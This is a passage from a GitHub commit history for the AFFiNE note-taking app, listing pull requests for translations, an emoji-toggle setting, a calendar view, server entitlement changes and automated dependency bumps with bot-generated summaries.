Fixes the order of the new setting toggle introduced in #14999. It appeared between "Auto-title new docs with current date" and "New doc date format" which both belong together. <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Style** * Repositioned the "display add icon option" setting within General settings for improved interface organization and logical grouping. <!-- review_stack_entry_start --> [](https://app.coderabbit.ai/change-stack/toeverything/AFFiNE/pull/15020?utm_source=github_walkthrough&utm_medium=github&utm_campaign=change_stack) <!-- review_stack_entry_end --> <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
925c95ce88 |
feat(i18n): update German translation (#15011)
<!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Localization** * German language completeness raised to 100%. * Added German translations for Markdown export/copy labels and success text, import formats (including Bear backup and Word .docx), editor settings (auto-date-title formats, add-icon option), AI BYOK workspace/provider-key UI and notifications, and a recording/importing UI prompt. <!-- review_stack_entry_start --> [](https://app.coderabbit.ai/change-stack/toeverything/AFFiNE/pull/15011?utm_source=github_walkthrough&utm_medium=github&utm_campaign=change_stack) <!-- review_stack_entry_end --> <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
3098b3b14b |
feat(server): bump models (#15013)
#### PR Dependency Tree * **PR #15013** 👈 This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal) <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Expanded AI capabilities with the addition of Gemini 3.5 Flash model, providing enhanced options for AI-powered features. * **Updates** * Updated Claude Sonnet to the latest version for improved performance. * Refreshed pro models configuration with optimized selections. <!-- review_stack_entry_start --> [](https://app.coderabbit.ai/change-stack/toeverything/AFFiNE/pull/15013?utm_source=github_walkthrough&utm_medium=github&utm_campaign=change_stack) <!-- review_stack_entry_end --> <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
dd1cd77ca0 |
chore(server): improve migration compatibility (#15014)
#### PR Dependency Tree * **PR #15014** 👈 This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal) <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Bug Fixes** * Remove orphaned legacy subscription and entitlement records during backfill. * Repair workspaces missing active owners by promoting eligible members and cleaning up empty workspaces. * Skip cloud subscription backfill when target user/workspace no longer exists to avoid dangling data. * **Tests** * Added tests verifying legacy data cleanup during backfill. * Added tests verifying workspace ownership repair and migration behavior. <!-- review_stack_entry_start --> [](https://app.coderabbit.ai/change-stack/toeverything/AFFiNE/pull/15014?utm_source=github_walkthrough&utm_medium=github&utm_campaign=change_stack) <!-- review_stack_entry_end --> <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
d20dbfd6a2 |
feat(editor): add page emoji display toggle #14987 (#14999)
This PR adds a display toggle for Page Emoji, so users can choose whether the add emoji option is shown in the page header when no emoji is set. What changed read editor setting for display add icon option hide emoji placeholder entry when the setting is disabled keep existing behavior for readonly mode and for pages that already have an emoji Why This implements the feature request to control Page Emoji visibility and improves header cleanliness for users who prefer a minimal UI. Issue Closes #14093 <img width="1277" height="726" alt="Screenshot 2026-05-19 at 3 44 14 PM" src="https://github.com/user-attachments/assets/caa29272-35c0-410d-bd54-2e038e4e0db2" /> <img width="1511" height="779" alt="Screenshot 2026-05-19 at 3 44 35 PM" src="https://github.com/user-attachments/assets/3504136a-d34c-45cc-992b-0056b018ff92" /> Testing verified in editable mode: setting ON: add emoji placeholder is visible when page has no emoji setting OFF: add emoji placeholder is hidden when page has no emoji verified in readonly mode: no emoji: nothing shown with emoji: existing emoji is shown verified no regression for selecting/changing/removing emoji Screenshots I will attach screenshots in this section. Quick rule checks before submit Base branch is canary. PR title follows conventional format: type(scope): subject. Scope editor is valid for this repo. Include Closes #14093 in the body. Add your screenshots before creating or right after opening the PR. <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Added an editor setting to toggle whether the "add icon" option is shown when creating new documents (default: enabled). * **User Experience** * When disabled, the add-icon trigger is hidden for documents that use a placeholder icon; readonly display remains unchanged. * **Tests** * Updated tests to cover the new setting and toggle behavior. * **Localization** * Added translations and updated i18n typings and completeness metrics. <!-- review_stack_entry_start --> [](https://app.coderabbit.ai/change-stack/toeverything/AFFiNE/pull/14999?utm_source=github_walkthrough&utm_medium=github&utm_campaign=change_stack) <!-- review_stack_entry_end --> <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
41145961f9 |
chore: bump up RevenueCat/purchases-ios-spm version to from: "5.73.0" (#15008)
This PR contains the following updates: | Package | Update | Change | |---|---|---| | [RevenueCat/purchases-ios-spm](https://redirect.github.com/RevenueCat/purchases-ios-spm) | minor | `from: "5.66.0"` → `from: "5.73.0"` | --- ### Release Notes <details> <summary>RevenueCat/purchases-ios-spm (RevenueCat/purchases-ios-spm)</summary> ### [`v5.73.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/blob/HEAD/CHANGELOG.md#5730) [Compare Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.72.0...5.73.0) #### 5.73.0 ### [`v5.72.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/blob/HEAD/CHANGELOG.md#5720) [Compare Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.71.0...5.72.0) #### 5.72.0 ### [`v5.71.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/blob/HEAD/CHANGELOG.md#5710) [Compare Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.70.0...5.71.0) #### 5.71.0 ### [`v5.70.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/blob/HEAD/CHANGELOG.md#5700) [Compare Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.69.0...5.70.0) #### 5.70.0 ### [`v5.69.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/blob/HEAD/CHANGELOG.md#5690) [Compare Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.68.0...5.69.0) #### 5.69.0 ### [`v5.68.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/blob/HEAD/CHANGELOG.md#5680) [Compare Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.67.2...5.68.0) #### 5.68.0 ### [`v5.67.2`](https://redirect.github.com/RevenueCat/purchases-ios-spm/blob/HEAD/CHANGELOG.md#5672) [Compare Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.67.1...5.67.2) #### 5.67.2 ### [`v5.67.1`](https://redirect.github.com/RevenueCat/purchases-ios-spm/blob/HEAD/CHANGELOG.md#5671) [Compare Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.67.0...5.67.1) #### 5.67.1 ### [`v5.67.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/blob/HEAD/CHANGELOG.md#5670) [Compare Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.66.0...5.67.0) #### 5.67.0 </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xODUuMSIsInVwZGF0ZWRJblZlciI6IjQzLjE4NS4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
1f2119e273 | fix: migration timeout | ||
|
|
9f33d37add | feat(core): integrate realtime features (#15003) | ||
|
|
3e42bbf4fa |
chore: bump up apple/swift-collections version to from: "1.5.1" (#15001)
This PR contains the following updates: | Package | Update | Change | |---|---|---| | [apple/swift-collections](https://redirect.github.com/apple/swift-collections) | patch | `from: "1.5.0"` → `from: "1.5.1"` | --- ### Release Notes <details> <summary>apple/swift-collections (apple/swift-collections)</summary> ### [`v1.5.1`](https://redirect.github.com/apple/swift-collections/releases/tag/1.5.1): Swift Collections 1.5.1 [Compare Source](https://redirect.github.com/apple/swift-collections/compare/1.5.0...1.5.1) This is a patch release resolving three issues uncovered since 1.5.0 was tagged, including a source breaking regression introduced in 1.4.0, affecting clients importing the `Collections` module. #### What's Changed - Import error from `HashTreeCollections`, reported by [@​vanvoorden](https://redirect.github.com/vanvoorden) in [#​653](https://redirect.github.com/apple/swift-collections/issues/653) - Resolve source break in the Collections module by [@​lorentey](https://redirect.github.com/lorentey) in [#​654](https://redirect.github.com/apple/swift-collections/pull/654) - Linker error around RigidArray when using in Embedded Swift for WebAssembly, reported by [@​sliemeobn](https://redirect.github.com/sliemeobn) in [#​648](https://redirect.github.com/apple/swift-collections/issues/648) - \[BasicContainers] Don’t define LLDB formatter symbol on Wasm by [@​lorentey](https://redirect.github.com/lorentey) in [#​650](https://redirect.github.com/apple/swift-collections/pull/650) - Guard `UniqueBox.borrow` correctly by [@​FranzBusch](https://redirect.github.com/FranzBusch) in [#​649](https://redirect.github.com/apple/swift-collections/pull/649) **Full Changelog**: <https://github.com/apple/swift-collections/compare/1.5.0...1.5.1> </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xODUuMSIsInVwZGF0ZWRJblZlciI6IjQzLjE4NS4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
b5e5f0708a |
chore: bump up Lakr233/MarkdownView version to from: "3.9.1" (#14861)
This PR contains the following updates: | Package | Update | Change | |---|---|---| | [Lakr233/MarkdownView](https://redirect.github.com/Lakr233/MarkdownView) | minor | `from: "3.8.2"` → `from: "3.9.1"` | --- ### Release Notes <details> <summary>Lakr233/MarkdownView (Lakr233/MarkdownView)</summary> ### [`v3.9.1`](https://redirect.github.com/Lakr233/MarkdownView/compare/3.9.0...3.9.1) [Compare Source](https://redirect.github.com/Lakr233/MarkdownView/compare/3.9.0...3.9.1) ### [`v3.9.0`](https://redirect.github.com/Lakr233/MarkdownView/compare/3.8.2...3.9.0) [Compare Source](https://redirect.github.com/Lakr233/MarkdownView/compare/3.8.2...3.9.0) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xMjMuOCIsInVwZGF0ZWRJblZlciI6IjQzLjE1OS4yIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
f96bf3dd24 |
feat(i18n): expand Urdu translation (#14995)
Closes #14994 🇵🇰 Urdu Translation for Pakistani Users ## Summary `ur.json` previously had only 31 of 2404 keys translated (~1%), leaving most of the AFFiNE UI in English for Urdu-speaking users. This PR fills in the remaining ~2400 keys so Pakistani / Urdu users get a fully localized experience. - `packages/frontend/i18n/src/resources/ur.json` — expanded from 31 → 2404 keys - `packages/frontend/i18n/src/i18n-completenesses.json` — `ur: 2` → `ur: 100` Existing hand-translated keys were preserved. ## Screenshots <img width="1600" height="716" alt="image" src="https://github.com/user-attachments/assets/1e3395b9-7cb0-44ba-a29f-a484419eb9fd" /> -------- <img width="1600" height="716" alt="image" src="https://github.com/user-attachments/assets/f03cb1ac-dde8-4425-a898-c56acebe45b6" /> ## Test plan - [x] Switch app language to Urdu (اردو) in Settings → Appearance → Language - [x] Sidebar, top bar, calendar, doc list, settings panels all render in Urdu - [x] RTL layout flows correctly - [x] Prettier + lint clean <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Localization** * Urdu language support is now fully available across the application, including translated UI text and locale-specific content. * Users can select Urdu as their preferred language and experience consistent translations and messaging throughout the product. <!-- review_stack_entry_start --> [](https://app.coderabbit.ai/change-stack/toeverything/AFFiNE/pull/14995?utm_source=github_walkthrough&utm_medium=github&utm_campaign=change_stack) <!-- review_stack_entry_end --> <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
c53457691d |
feat(server): entitlement based model (#14996)
#### PR Dependency Tree * **PR #14996** 👈 This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal) <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Admin mutations to grant/revoke commercial entitlements. * New Doc comment-update permission. * Realtime user/workspace quota-state endpoints and live-update rooms. * **Bug Fixes** * More accurate readable-doc filtering and permission evaluation. * **Refactor** * Workspace feature management moved to entitlement-based model; permission and quota pipelines redesigned. * Admin workspace UI now edits flags only (feature toggles removed). * **Tests** * Extensive new and updated tests for permissions, entitlements, quota, projection, and backfills. <!-- review_stack_entry_start --> [](https://app.coderabbit.ai/change-stack/toeverything/AFFiNE/pull/14996?utm_source=github_walkthrough&utm_medium=github&utm_campaign=change_stack) <!-- review_stack_entry_end --> <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
103ad2a810 |
feat(i18n): add Kazakh translation (#14981)
Closes #14975 <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Kazakh (kk) language has been added — users can now choose Kazakh for the interface, with complete localization coverage and language metadata (name and flag) included. <!-- review_stack_entry_start --> [](https://app.coderabbit.ai/change-stack/toeverything/AFFiNE/pull/14981?utm_source=github_walkthrough&utm_medium=github&utm_campaign=change_stack) <!-- review_stack_entry_end --> <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
0f5778ac89 |
feat(editor): calendar view for database block (#14984)
fix #13663 #### PR Dependency Tree * **PR #14984** 👈 This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal) <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Calendar view for database blocks (month layout, entry cards, external-source support) * Workspace calendar integration and new slash-menu "Calendar View" * **Improvements** * Create/manage database rows from calendar UI; preserve durations when moving/resizing ranges * Drag-and-drop, drop-preview, and hit-testing support for calendar and docs * Redesigned in-menu View settings with multi-page navigation * Context-menu input autofocus toggle and conditional back-navigation * **Tests** * New unit and E2E suites covering calendar layout, interactions, sources, and slash-menu integration <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
e9ef3c50c8 |
fix(editor): transcript note will create useless docs (#14976)
fix #13520 #### PR Dependency Tree * **PR #14976** 👈 This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal) <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Tests** * Added comprehensive test coverage for markdown insertion functionality to verify that existing document metadata remains unchanged when importing markdown content into workspace documents. * **Chores** * Optimized internal markdown-to-snapshot conversion process to use a more direct and efficient conversion approach. <!-- review_stack_entry_start --> [](https://app.coderabbit.ai/change-stack/toeverything/AFFiNE/pull/14976) <!-- review_stack_entry_end --> <!-- end of auto-generated comment: release notes by coderabbit.ai --> |